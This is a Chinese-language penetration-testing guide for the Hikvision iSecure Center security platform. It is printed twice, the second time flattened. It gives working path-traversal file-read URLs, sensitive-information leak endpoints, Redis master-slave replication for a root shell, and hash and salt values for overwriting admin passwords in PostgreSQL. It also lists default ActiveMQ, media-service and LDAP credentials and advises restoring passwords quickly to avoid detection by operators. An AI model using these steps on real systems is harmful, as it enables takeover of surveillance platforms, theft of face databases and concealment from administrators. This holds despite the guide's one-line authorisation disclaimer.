Hikvision综合安防管理平台isecure center文件读取深度利用
字数 3098 2025-08-22 12:22:15

Hikvision综合安防管理平台渗透测试深度利用指南

一、前言

本文档详细记录了Hikvision综合安防管理平台(iSecure Center)的渗透测试过程,重点针对敏感信息泄露和文件读取漏洞的深度利用。测试环境为内部授权测试,所有敏感信息已脱敏处理。

二、工具准备

  1. 指纹识别工具: observer_ward
  2. Hikvision专项扫描工具: Hikvision-
  3. Redis客户端连接工具: redis-cli
  4. 密码解密工具: DecryptTools
  5. LDAP连接工具: LdapAdminTool

三、漏洞入口点

1. 敏感信息泄露漏洞

  • https://xxx/portal/conf/config.properties
  • https://xxx/artemis-portal/artemis/env

2. 文件读取漏洞

  • https://xxx/center/api/task/..;/orgManage/v1/orgs/download?fileName=etc/passwd
  • https://xxx/lm/api/files;.css?link=/etc/passwd

四、敏感信息泄露利用

1. 配置文件解析

访问/portal/conf/config.properties获取关键信息:

  • 8001端口:运行管理中心后台
  • 7002端口:activeMQ消息交互端口
  • 7019端口:Redis数据库
  • 7092端口:核心PostgreSQL数据库

2. Redis利用

  • 使用redis-cli连接7019端口Redis服务
  • 可尝试主从复制获取root shell(推荐工具:redis-rogue-getshell)
  • 注意:未做站库分离时可尝试写入webshell

五、前台登录突破

1. 关键文件路径

  • Windows: D:/hikvision/web/components/postgresql96win64.1/conf/config.properties
  • Linux: /opt/hikvision/web/components/postgresql11linux64.1/conf/config.properties

2. 数据库信息

  • 数据库名:irds_irdsdb
  • 用户表:tb_user
  • 前台地址:https://xx:443

3. 密码重置方法

  1. 利用文件读取漏洞获取配置文件:
    https://ip/lm/api/files;.css?link=/opt/hikvision/web/opsMgrCenter/conf/config.properties
  2. 获取PostgreSQL密码(7092端口)
  3. 连接数据库修改tb_user表中的user_pwd和salt字段: 
    user_pwd: 1909408d3304f41421caae1fd5df984f21d70b516a315d375f94f87861eedc92
Salt: 938f7ad2436f3084a19dee5dc2e7a513892b696a8069a2f886ada7562226b1cc
  4. 使用新密码(hik123456)登录后可立即修改回原值

六、后台登录突破

1. 关键文件路径

  • Windows: D:/hikvision/web/opsMgrCenter/conf/config.properties
  • Linux: /opt/hikvision/web/opsMgrCenter/conf/config.properties

2. 数据库信息

  • 数据库名:opsmgr_db
  • 用户表:center_user
  • 后台地址:http://ip:8001

3. 密码重置方法

  1. 修改center_user表中的c_password和c_salt字段: 
    c_password: 1909408d3304f41421caae1fd5df984f21d70b516a315d375f94f87861eedc92
c_salt: 938f7ad2436f3084a19dee5dc2e7a513892b696a8069a2f886ada7562226b1cc
  2. 使用用户名sysadmin和新密码(hik123456)登录

七、其他关键配置文件

  1. NTP服务:
    /opt/hikvision/web/components/ntp.1/conf/config.properties

  2. ActiveMQ:
    /opt/hikvision/web/components/activemq514linux64.1/conf/config.properties

    • Web界面: http://ip:8028
    • 默认凭证: admin/pass

  3. 集群配置:
    /opt/hikvision/web/components/cluster.1/conf/config.properties

  4. 许可证管理:
    /opt/hikvision/web/components/lm.1/conf/config.properties

  5. 日志服务:
    /opt/hikvision/web/components/ls.1/conf/config.properties

  6. 许可证服务器管理:
    /opt/hikvision/web/components/lsm.1/conf/config.properties

  7. 媒体处理服务:
    /opt/hikvision/web/components/mps.1/conf/config.properties

    • Web界面: http://ip:8030
    • 默认凭证: admin/pass

  8. Node.js配置:
    /opt/hikvision/web/components/nodejslinux64.1/conf/config.properties

  9. OpenJDK配置:
    /opt/hikvision/web/components/openjdk11linux64.1/conf/config.properties

  10. PostgreSQL配置:
    /opt/hikvision/web/components/postgresql11linux64.1/conf/config.properties

  11. Redis配置:
    /opt/hikvision/web/components/redislinux64.1/conf/config.properties

  12. 报表服务:
    /opt/hikvision/web/components/reportservice.1/conf/config.properties

  13. 服务虚拟机:
    /opt/hikvision/web/components/svm.1/conf/config.properties

  14. Tomcat配置:
    /opt/hikvision/web/components/tomcat85linux64.1/conf/config.properties

八、LDAP服务利用

/opt/hikvision/web/opsMgrCenter/conf/config.properties底部可找到LDAP凭证:

  • BaseDN: dc=platform,dc=hikvision,dc=com (可不填)
  • UserDN: cn=Manager,dc=hikvision,dc=com
  • Password: pass

九、注意事项

  1. 提权风险:Redis已可获取服务器root权限,不建议再进行PostgreSQL提权尝试
  2. 隐蔽操作:修改密码后应立即恢复原值,避免被运维发现
  3. 数据敏感性:该平台通常包含大量人脸库等敏感数据,获取后HVV数据分较高
  4. 环境差异:不同版本配置路径可能略有不同,需灵活调整

十、总结

通过本指南,渗透测试人员可以:

  1. 利用信息泄露漏洞获取关键配置
  2. 通过文件读取漏洞获取数据库凭证
  3. 重置前后台管理员密码获取系统控制权
  4. 访问多个内部服务获取更多敏感信息
  5. 最终实现对整个安防平台的全面控制

请确保所有测试均在合法授权范围内进行,避免对生产环境造成不必要的影响。

Hikvision综合安防管理平台渗透测试深度利用指南 一、前言 本文档详细记录了Hikvision综合安防管理平台(iSecure Center)的渗透测试过程,重点针对敏感信息泄露和文件读取漏洞的深度利用。测试环境为内部授权测试,所有敏感信息已脱敏处理。 二、工具准备 指纹识别工具 : observer_ ward Hikvision专项扫描工具 : Hikvision- Redis客户端连接工具 : redis-cli 密码解密工具 : DecryptTools LDAP连接工具 : LdapAdminTool 三、漏洞入口点 1. 敏感信息泄露漏洞 https://xxx/portal/conf/config.properties https://xxx/artemis-portal/artemis/env 2. 文件读取漏洞 https://xxx/center/api/task/..;/orgManage/v1/orgs/download?fileName=etc/passwd https://xxx/lm/api/files;.css?link=/etc/passwd 四、敏感信息泄露利用 1. 配置文件解析 访问 /portal/conf/config.properties 获取关键信息: 8001端口:运行管理中心后台 7002端口:activeMQ消息交互端口 7019端口:Redis数据库 7092端口:核心PostgreSQL数据库 2. Redis利用 使用redis-cli连接7019端口Redis服务 可尝试主从复制获取root shell(推荐工具:redis-rogue-getshell) 注意:未做站库分离时可尝试写入webshell 五、前台登录突破 1. 关键文件路径 Windows : D:/hikvision/web/components/postgresql96win64.1/conf/config.properties Linux : /opt/hikvision/web/components/postgresql11linux64.1/conf/config.properties 2. 数据库信息 数据库名:irds_ irdsdb 用户表:tb_ user 前台地址: https://xx:443 3. 密码重置方法 利用文件读取漏洞获取配置文件: https://ip/lm/api/files;.css?link=/opt/hikvision/web/opsMgrCenter/conf/config.properties 获取PostgreSQL密码(7092端口) 连接数据库修改tb_ user表中的user_ pwd和salt字段: 使用新密码(hik123456)登录后可立即修改回原值 六、后台登录突破 1. 关键文件路径 Windows : D:/hikvision/web/opsMgrCenter/conf/config.properties Linux : /opt/hikvision/web/opsMgrCenter/conf/config.properties 2. 数据库信息 数据库名:opsmgr_ db 用户表:center_ user 后台地址: http://ip:8001 3. 密码重置方法 修改center_ user表中的c_ password和c_ salt字段: 使用用户名 sysadmin 和新密码(hik123456)登录 七、其他关键配置文件 NTP服务 : /opt/hikvision/web/components/ntp.1/conf/config.properties ActiveMQ : /opt/hikvision/web/components/activemq514linux64.1/conf/config.properties Web界面: http://ip:8028 默认凭证: admin/pass 集群配置 : /opt/hikvision/web/components/cluster.1/conf/config.properties 许可证管理 : /opt/hikvision/web/components/lm.1/conf/config.properties 日志服务 : /opt/hikvision/web/components/ls.1/conf/config.properties 许可证服务器管理 : /opt/hikvision/web/components/lsm.1/conf/config.properties 媒体处理服务 : /opt/hikvision/web/components/mps.1/conf/config.properties Web界面: http://ip:8030 默认凭证: admin/pass Node.js配置 : /opt/hikvision/web/components/nodejslinux64.1/conf/config.properties OpenJDK配置 : /opt/hikvision/web/components/openjdk11linux64.1/conf/config.properties PostgreSQL配置 : /opt/hikvision/web/components/postgresql11linux64.1/conf/config.properties Redis配置 : /opt/hikvision/web/components/redislinux64.1/conf/config.properties 报表服务 : /opt/hikvision/web/components/reportservice.1/conf/config.properties 服务虚拟机 : /opt/hikvision/web/components/svm.1/conf/config.properties Tomcat配置 : /opt/hikvision/web/components/tomcat85linux64.1/conf/config.properties 八、LDAP服务利用 在 /opt/hikvision/web/opsMgrCenter/conf/config.properties 底部可找到LDAP凭证: BaseDN: dc=platform,dc=hikvision,dc=com (可不填) UserDN: cn=Manager,dc=hikvision,dc=com Password: pass 九、注意事项 提权风险 :Redis已可获取服务器root权限,不建议再进行PostgreSQL提权尝试 隐蔽操作 :修改密码后应立即恢复原值,避免被运维发现 数据敏感性 :该平台通常包含大量人脸库等敏感数据,获取后HVV数据分较高 环境差异 :不同版本配置路径可能略有不同,需灵活调整 十、总结 通过本指南,渗透测试人员可以: 利用信息泄露漏洞获取关键配置 通过文件读取漏洞获取数据库凭证 重置前后台管理员密码获取系统控制权 访问多个内部服务获取更多敏感信息 最终实现对整个安防平台的全面控制 请确保所有测试均在合法授权范围内进行,避免对生产环境造成不必要的影响。